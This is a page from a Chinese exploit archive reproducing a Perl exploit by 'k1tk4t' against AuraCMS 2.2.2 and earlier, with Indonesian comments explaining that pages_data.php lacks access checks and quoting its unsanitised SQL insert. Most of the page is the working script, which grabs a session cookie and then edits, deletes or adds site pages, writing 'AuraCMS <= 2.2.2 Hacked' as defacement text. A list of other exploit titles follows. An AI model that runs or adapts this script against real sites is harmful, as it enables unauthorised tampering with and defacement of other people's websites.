手机
当前位置:查字典教程网 >网络安全 >Exploit >AuraCMS
AuraCMS
摘要:#!/usr/bin/perl#k1tk4tPublicSecurityAdvisory#/////////////////////////...

#!/usr/bin/perl

# k1tk4t Public Security Advisory

# ////////////////////////////////////////////////////////////

# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit

# Vendor : http://www.auracms.org/

# Kutu : ./js/pages/pages_data.php

# Keterangan :

# pada berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level

# dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini?

# karena didalam berkas ini terdapat kode yang dapat menghapus(delete)

# menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga

# dengan tidak adanya kejelasan aturan pada berkas pages_data.php ini

# maka berkas ini mutlak terdapat KUTU yang amat menjijikan.... huee..... :(

# potongan kode dari pages_data.php

# --//--

# 03: @ob_start('ob_gzhandler');

# 04: @header("Content-type: text/plain; charset=utf-8;");

# 05: @header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1

# 06: @header("Pragma: no-cache");

# 07:

# 08: include '../../includes/session.php';

# 09: include '../../includes/config.php';

# 10: include '../../includes/fungsi.php';

# 11: include '../../includes/mysql.php';

# 12: include '../../includes/json.php';

# 13:

# 14:

# 15: if (!isset($_SESSION['mod_ajax'])){

# 16: exit;

# 17: }

# --//--

# Lihat.... tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya

# dalam mengakses berkas ini

# --//--

# 20: switch (@$_GET['action']){

# 21:

# 22: case 'add':

# 23: $_POST = array_map ('decodeURIComponent',$_POST);

# 24: $judul = $_POST['judul'];

# 25: $konten = $_POST['konten'];

# 26: $open['error'] = false;

# 27: $open['errorpesan'] = '';

# 28: if (!empty($judul) && !empty($konten)){

# 29: $query = mysql_query ("INSERT INTO `halaman` (`judul`,`konten`) VALUES ('$judul','$konten')");

# 30: if ($query){

# --//--

# diatas ini satu contoh bagaimana berkas ini berperilaku, lihat... bisa menambahkan data halaman pada database kan...

# kacoooo, kacoooo, :(

# selebihnya liat sendiri yaa... panjang soalnya... :p

#

# Terimakasih untuk ;

# str0ke,DNX,n0c0py,L41n,

# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],

# eCHo->[y3dips,K-159,lirva32,dan staff lainnya]

use LWP::UserAgent;

use HTTP::Cookies;

use Getopt::Long;

if ( !$ARGV[1] ) {

print "n ///////////////////////////////////////////////////////////";

print "n // ..::> k1tk4t <::.. //";

print "n // AuraCMS <= 2.2.2 (pages_data.php) //";

print "n // Arbitrary Edit/Add/Delete data halaman exploit //";

print "n ///////////////////////////////////////////////////////////";

print "n[!] ";

print "n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]";

print "n[!] Contoh : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1";

print "n[!] Options : 1=Edit , 2=Delete, 3=Add";

print "n";

exit;

}

my $host = $ARGV[0];

my $path = $ARGV[1];

my $idhalaman = $ARGV[2];

my $isijudul = "AuraCMS <= 2.2.2 Hacked";

my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman";

my $ambilkue = "http://".$host.$path."index.php";

my $browser = LWP::UserAgent->new;

my $kue = HTTP::Cookies->new();

my $hasil = "";

%options = ();

GetOptions(%options, "o=i",);

if($options{"o"} && $options{"o"} == 1) {

$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id=";

}

if($options{"o"} && $options{"o"} == 2) {

$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id=";

}

if($options{"o"} && $options{"o"} == 3) {

$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id=";

}

$hasil = $browser->get($arbitrary);

if(!$hasil->is_success) {

die("[!] Gagal, berkas pages_data.php tidak tersedian");

}

# ambil kue dari website

$hasil = $browser->get($ambilkue);

$kue->extract_cookies($hasil);

$browser->cookie_jar($kue);

# arbitrary exploit

$arbitrary .= $idhalaman;

$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);

$konten = $hasil->content;

print $konten ;

【AuraCMS】相关文章:

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

MS Internet Explorer Recordset Double Free Memory Exploit

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC

Linux Kernel

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

精品推荐
分类导航